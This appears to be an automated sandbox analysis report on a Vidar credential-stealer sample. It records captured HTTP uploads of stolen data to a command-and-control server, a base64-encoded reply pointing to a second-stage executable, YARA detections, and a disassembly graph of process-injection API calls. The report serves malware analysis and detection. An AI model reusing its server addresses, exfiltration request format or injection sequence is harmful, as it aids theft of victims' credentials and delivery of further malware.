                                                                                                                                                                  21192.168.2.64974449.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:27 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 97509
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAFHIJDHDGDBFHIEHDGICont
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 52 31 6f 70 54 51 4d 62 6a 6a 76 53 64 71 63 66 65 6b 4e 4d 42 4b 43 50 57 6a 70 51 66 61 6b 4d 54 2f 41 43 61 51 66 6a 54 6a 7a 54 61 59 49 4d 2b 6d 4b 44 2b 66 31 6f 7a 52 32 2b 6e 72 51 4d 4f 75 4f 74 49 61 4d 34 48 76 53 6b 6a 4e 41 43 48 70 30 70 4d 55 76 55 65 74 47 4f 61 42 69 64 6a 53 59 78 32 70 63 55 59 4a 37 38 30 44 45 7a 6b 30 55 70 4f 54 53 55 41 48 65 6b 39 6a 2b 56 4c 6e 73 50 79 70 50 35 65 39 41 42 30 6f 48 48 65 6c 78 6d 6b 78 51 4d 4b 54 4f 65 31 4c 33 2f 6e 51 4b 41 41 2b 6c 4a 2b 56 48 31 6f 36 55 44 45 78 2b 58 74 51 65 50 70 53 6b 66 38 41 36 36 51 6a 42 37 55 41 4a 37 66 79 70 61 4f 31 42 42 78 53 43 35 33 74 46 46 46 51 66 4c 45 55 38 30 31 70 59 33 6c 37 44 71 4e 76 70 30 36 42 62 65 31 6e 75 46 6c 5a 66 4e 63 35 62 48 6c 6f 78
                                                                                                                                                                  Data Ascii: R1opTQMbjjvSdqcfekNMBKCPWjpQfakMT/ACaQfjTjzTaYIM+mKD+f1ozR2+nrQMOuOtIaM4HvSkjNACHp0pMUvUetGOaBidjSYx2pcUYJ780DEzk0UpOTSUAHek9j+VLnsPypP5e9AB0oHHelxmkxQMKTOe1L3/nQKAA+lJ+VH1o6UDEx+XtQePpSkf8A66QjB7UAJ7fypaO1BBxSC53tFFFQfLEU801pY3l7DqNvp06Bbe1nuFlZfNc5bHlox
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 71 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 31 72 6e 2f 45 63 34 4c 51 77 41 39 4d 75 33 39 50 36 31 2b 54 63 4d 78 6c 57 7a 69 6b 34 64 47 33 36 4b 7a 2f 41 4f 47 50 71 4f 49 5a 78 70 5a 5a 55 35 75 71 53 2b 64 30 59 56 4a 7a 53 30 56 2b 31 6e 35 47 46 4e 38 4d 58 2f 38 41 5a 33 78 48 73 5a 53 63 4c 4a 4b 73 4c 66 38 41 41 31 32 2f 7a 49 50 34 55 36 75 64 31 43 52 34 64 58 61 56 43 56 64 47 56 6c 50 6f 51 42 57 56 61 43 6e 54 63 58 31 50 55 79 6d 58 4c 69 4f 62 73 76 31 52 36 37 70 6d 6e 77 61 4c 62 79 65 47 70 56 55 48 57 37 69 2b 43 6c 68 30 52 52 74 58 39 42 6e 38 61 34 6a 78 75 48 30 33 52 50 44 57 68 4f 75 79 53 33 73 7a 63 54 4a 36
                                                                                                                                                                  Data Ascii: JNWZnhcNWlWirW1NK6CpeTqv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyT1rn/Ec4LQwA9Mu39P61+TcMxlWzik4dG36Kz/AOGPqOIZxpZZU5uqS+d0YVJzS0V+1n5GFN8MX/8AZ3xHsZScLJKsLf8AA12/zIP4U6ud1CR4dXaVCVdGVlPoQBWVaCnTcX1PUymXLiObsv1R67pmnwaLbyeGpVUHW7i+Clh0RRtX9Bn8a4jxuH03RPDWhOuyS3szcTJ6
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 74 4a 7a 53 6e 70 53 63 6a 38 4b 6c 6c 49 51 64 65 61 51 2b 39 4b 4f 61 43 42 55 6a 45 2f 53 6b 6f 36 6e 33 6f 4a 2f 79 4b 51 78 44 7a 53 47 6a 46 4a 6d 6b 4f 77 64 54 2f 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 77 43 45 66 30 58 2f 41 4b 47 7a 53 2f 38 41 76 34 6e 2f 41 4d 58 56 79 30 38 45 51 58 38 52 6c 73 39 63 74 72 69 4d 4e 74 4c 77 71 48 41 50 70 6b 4e 31 35 46 4e 35 73 6f 71 37 67 77 58 44 30 35 4f 79 71 49 34 36 69 75 2f 48 67 46 41 41 44 63 78 6b 67 4b 43
                                                                                                                                                                  Data Ascii: tJzSnpScj8KllIQdeaQ+9KOaCBUjE/Sko6n3oJ/yKQxDzSGjFJmkOwdT/SkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/wCEf0X/AKGzS/8Av4n/AMXVy08EQX8Rls9ctriMNtLwqHAPpkN15FN5soq7gwXD05OyqI46iu/HgFAADcxkgKC
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 4d 73 54 33 50 34 30 30 6e 33 70 70 4e 4c 6d 4c 55 52 32 34 35 4e 49 54 6d 6b 4a 7a 53 5a 35 70 58 5a 64 6b 49 65 39 4a 6e 74 53 30 6c 4b 35 51 66 30 70 41 50 70 52 30 6f 7a 2f 4f 69 34 78 4b 43 63 39 38 30 63 5a 7a 53 48 6d 67 59 6d 61 54 4f 4f 6c 4c 30 37 30 6e 35 55 44 44 50 50 46 49 63 39 4f 61 41 66 66 72 51 66 78 6f 47 49 61 51 6e 4e 4c 53 55 68 69 64 36 4f 6c 42 36 38 30 44 2f 41 4f 74 51 4d 54 6f 78 6f 4e 42 2f 4f 6a 2b 58 76 51 41 68 4a 42 70 4f 67 70 65 76 34 55 59 6f 75 4d 54 70 52 52 52 79 42 36 30 68 6e 6f 74 46 46 46 51 66 49 42 52 57 72 34 66 73 49 64 52 31 50 37 50 4f 43 55 4b 45 38 48 48 4e 64 55 6e 67 79 7a 59 5a 43 6a 2f 76 74 71 38 72 46 35 76 52 77 74 62 32 4d 6f 74 75 31 39 4c 66 71 30 65 78 67 63 6c 78 47 4d 70 65 32 70 74 4a 58 74
                                                                                                                                                                  Data Ascii: MsT3P400n3ppNLmLUR245NITmkJzSZ5pXZdkIe9JntS0lK5Qf0pAPpR0oz/Oi4xKCc980cZzSHmgYmaTOOlL070n5UDDPPFIc9OaAffrQfxoGIaQnNLSUhid6OlB680D/AOtQMToxoNB/Oj+XvQAhJBpOgpev4UYouMTpRRRyB60hnotFFFQfIBRWr4fsIdR1P7POCUKE8HHNdUngyzYZCj/vtq8rF5vRwtb2Motu19Lfq0exgclxGMpe2ptJXt
                                                                                                                                                                  2024-10-03 01:36:27 UTC15734OUTData Raw: 55 64 36 50 78 6f 47 42 2f 72 54 53 4b 64 53 63 30 78 69 55 6d 65 61 55 39 61 53 67 59 6d 4b 4b 57 6a 48 35 30 68 69 55 6d 4d 66 6e 53 6d 6b 6f 47 47 4b 54 76 51 65 4b 4d 66 6a 51 4d 51 30 55 47 6a 76 51 41 55 6e 42 36 38 30 55 65 31 41 78 44 78 36 55 64 2f 65 67 39 63 64 4b 42 78 51 4d 44 7a 53 64 66 65 6c 78 52 6d 67 42 43 4b 51 2f 35 35 70 65 67 7a 2b 46 4a 51 4d 39 45 6f 6f 6f 71 44 35 49 36 54 77 54 2f 79 47 5a 76 2b 76 64 76 2f 41 45 4a 61 37 53 38 50 2b 69 79 66 68 2f 4d 56 78 66 67 72 2f 6b 4d 7a 66 39 65 37 66 2b 68 4c 58 59 58 7a 34 74 38 66 33 6d 41 2f 72 2f 53 76 7a 7a 69 56 2f 77 43 32 76 30 52 2b 6a 63 4d 4c 2f 59 56 36 73 71 78 47 69 2f 73 78 71 47 6e 54 57 75 2f 5a 35 67 47 47 39 43 43 43 50 35 55 6b 58 61 72 63 64 66 4f 55 71 6b 71 63 31
                                                                                                                                                                  Data Ascii: Ud6PxoGB/rTSKdSc0xiUmeaU9aSgYmKKWjH50hiUmMfnSmkoGGKTvQeKMfjQMQ0UGjvQAUnB680Ue1AxDx6Ud/eg9cdKBxQMDzSdfelxRmgBCKQ/55pegz+FJQM9EoooqD5I6TwT/yGZv+vdv/AEJa7S8P+iyfh/MVxfgr/kMzf9e7f+hLXYXz4t8f3mA/r/SvzziV/wC2v0R+jcML/YV6sqxGi/sxqGnTWu/Z5gGG9CCCP5UkXarcdfOUqkqc1
                                                                                                                                                                  2024-10-03 01:36:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:28 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  22192.168.2.64974549.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:28 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------JEHDHIEGIIIDHIDHDHJJCont
                                                                                                                                                                  2024-10-03 01:36:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:29 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:29 UTC91INData Raw: 35 30 0d 0a 4d 54 49 32 4e 6a 6b 79 4d 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 50MTI2NjkyMnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:21:35:26
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                  Imagebase:0xa90000
                                                                                                                                                                  File size:418'480 bytes
                                                                                                                                                                  MD5 hash:37EC6AC7A655216941A30DC46FE1B189
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:21:35:26
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:21:35:27
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                  Imagebase:0x9d0000
                                                                                                                                                                  File size:43'016 bytes
                                                                                                                                                                  MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:11.9%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:5.8%
                                                                                                                                                                    Total number of Nodes:984
                                                                                                                                                                    Total number of Limit Nodes:7
                                                                                                                                                                    execution_graph 11577 6e7f9df0 11589 6e7f9e47 std::bad_exception::bad_exception 11577->11589 11578 6e7ff47c Wow64GetThreadContext 11578->11589 11579 6e800b23 11580 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11579->11580 11581 6e800b2d 11580->11581 11582 6e7ff9f8 WriteProcessMemory 11582->11589 11583 6e800a21 CloseHandle CloseHandle 11583->11589 11584 6e8003ce ReadProcessMemory 11584->11589 11585 6e8010ae ResumeThread 11585->11589 11586 6e7ff74a VirtualAllocEx 11586->11589 11587 6e7ff187 GetConsoleWindow ShowWindow 11601 6e7f7510 11587->11601 11589->11578 11589->11579 11589->11582 11589->11583 11589->11584 11589->11585 11589->11586 11589->11587 11590 6e7f7510 20 API calls 11589->11590 11592 6e800887 WriteProcessMemory Wow64SetThreadContext 11589->11592 11593 6e7ff3e2 CreateProcessW 11589->11593 11594 6e7ff2bf VirtualAlloc 11589->11594 11595 6e800f15 WriteProcessMemory 11589->11595 11596 6e7ff5e2 VirtualAllocEx 11589->11596 11597 6e7ff7e9 WriteProcessMemory 11589->11597 11598 6e7f9610 7 API calls 11589->11598 11599 6e800986 ResumeThread 11589->11599 11600 6e80047d WriteProcessMemory 11589->11600 11619 6e7f7310 11589->11619 11590->11589 11592->11589 11593->11589 11594->11589 11595->11589 11596->11589 11597->11589 11598->11589 11599->11589 11600->11589 11608 6e7f7539 __InternalCxxFrameHandler std::bad_exception::bad_exception 11601->11608 11602 6e7f7bf8 GetModuleHandleA 11602->11608 11603 6e7f7cc0 K32GetModuleInformation 11603->11608 11604 6e7f8562 VirtualProtect 11604->11608 11605 6e7f8108 MapViewOfFile 11605->11608 11606 6e7f8c8b CloseHandle 11606->11608 11607 6e7f7d08 GetModuleFileNameA CreateFileA 11607->11608 11608->11602 11608->11603 11608->11604 11608->11605 11608->11606 11608->11607 11609 6e7f8a37 CloseHandle CloseHandle 11608->11609 11610 6e7f8019 CloseHandle 11608->11610 11611 6e7f7dde CreateFileMappingA 11608->11611 11612 6e7f8b5d 11608->11612 11615 6e7f8b6f GetModuleHandleA 11608->11615 11616 6e7f8677 VirtualProtect 11608->11616 11617 6e7f7b32 GetCurrentProcess 11608->11617 11618 6e7f89b9 CloseHandle 11608->11618 11609->11608 11610->11608 11611->11608 11613 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11612->11613 11614 6e7f8b67 11613->11614 11614->11589 11615->11608 11616->11608 11617->11608 11618->11608 11620 6e7f736f 11619->11620 11620->11620 11621 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11620->11621 11622 6e7f74ed 11621->11622 11622->11589 10873 6e80bca4 10874 6e80bcb2 10873->10874 10875 6e80bcad 10873->10875 10879 6e80bb6e 10874->10879 10894 6e80be88 10875->10894 10881 6e80bb7a ___scrt_is_nonwritable_in_current_image 10879->10881 10880 6e80bba3 dllmain_raw 10882 6e80bbbd dllmain_crt_dispatch 10880->10882 10883 6e80bb89 10880->10883 10881->10880 10881->10883 10884 6e80bb9e 10881->10884 10882->10883 10882->10884 10898 6e8010e0 10884->10898 10887 6e80bc0f 10887->10883 10888 6e80bc18 dllmain_crt_dispatch 10887->10888 10888->10883 10890 6e80bc2b dllmain_raw 10888->10890 10889 6e8010e0 __DllMainCRTStartup@12 5 API calls 10891 6e80bbf6 10889->10891 10890->10883 10902 6e80babe 10891->10902 10893 6e80bc04 dllmain_raw 10893->10887 10895 6e80be9e 10894->10895 10897 6e80bea7 10895->10897 11238 6e80be3b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10895->11238 10897->10874 10899 6e80110a 10898->10899 10929 6e80b8f0 10899->10929 10901 6e80177e 10901->10887 10901->10889 10904 6e80baca ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10902->10904 10903 6e80bad3 10903->10893 10904->10903 10905 6e80bb66 10904->10905 10906 6e80bafb 10904->10906 10958 6e80c1f2 IsProcessorFeaturePresent 10905->10958 10937 6e80c023 10906->10937 10909 6e80bb00 10946 6e80bedf 10909->10946 10911 6e80bb6d ___scrt_is_nonwritable_in_current_image 10912 6e80bba3 dllmain_raw 10911->10912 10915 6e80bb9e 10911->10915 10926 6e80bb89 10911->10926 10914 6e80bbbd dllmain_crt_dispatch 10912->10914 10912->10926 10913 6e80bb05 __RTC_Initialize __DllMainCRTStartup@12 10949 6e80c1c4 10913->10949 10914->10915 10914->10926 10918 6e8010e0 __DllMainCRTStartup@12 5 API calls 10915->10918 10920 6e80bbde 10918->10920 10921 6e80bc0f 10920->10921 10923 6e8010e0 __DllMainCRTStartup@12 5 API calls 10920->10923 10922 6e80bc18 dllmain_crt_dispatch 10921->10922 10921->10926 10924 6e80bc2b dllmain_raw 10922->10924 10922->10926 10925 6e80bbf6 10923->10925 10924->10926 10927 6e80babe __DllMainCRTStartup@12 81 API calls 10925->10927 10926->10893 10928 6e80bc04 dllmain_raw 10927->10928 10928->10921 10930 6e80b8f8 10929->10930 10931 6e80b8f9 IsProcessorFeaturePresent 10929->10931 10930->10901 10933 6e80bd04 10931->10933 10936 6e80bcc7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10933->10936 10935 6e80bde7 10935->10901 10936->10935 10938 6e80c028 ___scrt_release_startup_lock 10937->10938 10939 6e80c02c 10938->10939 10943 6e80c038 __DllMainCRTStartup@12 10938->10943 10962 6e81106a 10939->10962 10941 6e80c036 10941->10909 10942 6e80c045 10942->10909 10943->10942 10966 6e810852 10943->10966 11103 6e80e6aa InterlockedFlushSList 10946->11103 10950 6e80c1d0 10949->10950 10951 6e80bb24 10950->10951 11110 6e811213 10950->11110 10955 6e80bb60 10951->10955 10953 6e80c1de 11115 6e80e6ff 10953->11115 11221 6e80c046 10955->11221 10959 6e80c208 __InternalCxxFrameHandler std::bad_exception::bad_exception 10958->10959 10960 6e80c2b3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10959->10960 10961 6e80c2f7 __InternalCxxFrameHandler 10960->10961 10961->10911 10963 6e811076 __EH_prolog3 10962->10963 10977 6e810f34 10963->10977 10965 6e81109d __DllMainCRTStartup@12 10965->10941 10967 6e81087f 10966->10967 10975 6e810890 10966->10975 11048 6e81091a GetModuleHandleW 10967->11048 10972 6e8108ce 10972->10909 11055 6e81071d 10975->11055 10978 6e810f40 ___scrt_is_nonwritable_in_current_image 10977->10978 10985 6e811b83 EnterCriticalSection 10978->10985 10980 6e810f4e 10986 6e810f90 10980->10986 10985->10980 10987 6e810faf 10986->10987 10988 6e810f5b 10986->10988 10987->10988 10993 6e811c30 10987->10993 10990 6e810f83 10988->10990 11047 6e811bcb LeaveCriticalSection 10990->11047 10992 6e810f6c 10992->10965 10994 6e811c3b HeapFree 10993->10994 10998 6e811c65 10993->10998 10995 6e811c50 GetLastError 10994->10995 10994->10998 10996 6e811c5d __dosmaperr 10995->10996 10999 6e811d53 10996->10999 10998->10988 11002 6e811908 GetLastError 10999->11002 11001 6e811d58 11001->10998 11003 6e811924 11002->11003 11004 6e81191e 11002->11004 11008 6e811928 SetLastError 11003->11008 11030 6e8136ab 11003->11030 11025 6e81366c 11004->11025 11008->11001 11012 6e81195d 11014 6e8136ab _unexpected 6 API calls 11012->11014 11013 6e81196e 11015 6e8136ab _unexpected 6 API calls 11013->11015 11022 6e81196b 11014->11022 11016 6e81197a 11015->11016 11017 6e811995 11016->11017 11018 6e81197e 11016->11018 11042 6e8115b9 11017->11042 11019 6e8136ab _unexpected 6 API calls 11018->11019 11019->11022 11020 6e811c30 __freea 12 API calls 11020->11008 11022->11020 11024 6e811c30 __freea 12 API calls 11024->11008 11026 6e81350a _unexpected 5 API calls 11025->11026 11027 6e813688 11026->11027 11028 6e813691 11027->11028 11029 6e8136a3 TlsGetValue 11027->11029 11028->11003 11031 6e81350a _unexpected 5 API calls 11030->11031 11032 6e8136c7 11031->11032 11033 6e811940 11032->11033 11034 6e8136e5 TlsSetValue 11032->11034 11033->11008 11035 6e811d66 11033->11035 11040 6e811d73 _unexpected 11035->11040 11036 6e811db3 11038 6e811d53 __dosmaperr 13 API calls 11036->11038 11037 6e811d9e HeapAlloc 11039 6e811955 11037->11039 11037->11040 11038->11039 11039->11012 11039->11013 11040->11036 11040->11037 11041 6e8104b5 _unexpected EnterCriticalSection LeaveCriticalSection 11040->11041 11041->11040 11043 6e81144d _unexpected EnterCriticalSection LeaveCriticalSection 11042->11043 11044 6e811627 11043->11044 11045 6e81155f _unexpected 14 API calls 11044->11045 11046 6e811650 11045->11046 11046->11024 11047->10992 11049 6e810884 11048->11049 11049->10975 11050 6e810975 GetModuleHandleExW 11049->11050 11051 6e8109c8 11050->11051 11052 6e8109b4 GetProcAddress 11050->11052 11053 6e8109e4 11051->11053 11054 6e8109db FreeLibrary 11051->11054 11052->11051 11053->10975 11054->11053 11056 6e810729 ___scrt_is_nonwritable_in_current_image 11055->11056 11057 6e810733 11056->11057 11070 6e811b83 EnterCriticalSection 11056->11070 11071 6e81076a 11057->11071 11060 6e810740 11075 6e81075e 11060->11075 11063 6e8108e9 11079 6e81095c 11063->11079 11065 6e8108f3 11066 6e810907 11065->11066 11067 6e8108f7 GetCurrentProcess TerminateProcess 11065->11067 11068 6e810975 __InternalCxxFrameHandler 3 API calls 11066->11068 11067->11066 11069 6e81090f ExitProcess 11068->11069 11070->11057 11073 6e810776 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 11071->11073 11072 6e81106a __DllMainCRTStartup@12 14 API calls 11074 6e8107da __InternalCxxFrameHandler 11072->11074 11073->11072 11073->11074 11074->11060 11078 6e811bcb LeaveCriticalSection 11075->11078 11077 6e81074c 11077->10972 11077->11063 11078->11077 11082 6e811c8f 11079->11082 11081 6e810961 __InternalCxxFrameHandler 11081->11065 11083 6e811c9e __InternalCxxFrameHandler 11082->11083 11084 6e811cab 11083->11084 11086 6e81358f 11083->11086 11084->11081 11089 6e81350a 11086->11089 11088 6e8135ab 11088->11084 11090 6e81353a 11089->11090 11094 6e813536 _unexpected 11089->11094 11090->11094 11095 6e81343f 11090->11095 11093 6e813554 GetProcAddress 11093->11094 11094->11088 11096 6e813450 ___vcrt_InitializeCriticalSectionEx 11095->11096 11097 6e8134e6 11096->11097 11098 6e81346e LoadLibraryExW 11096->11098 11102 6e8134bc LoadLibraryExW 11096->11102 11097->11093 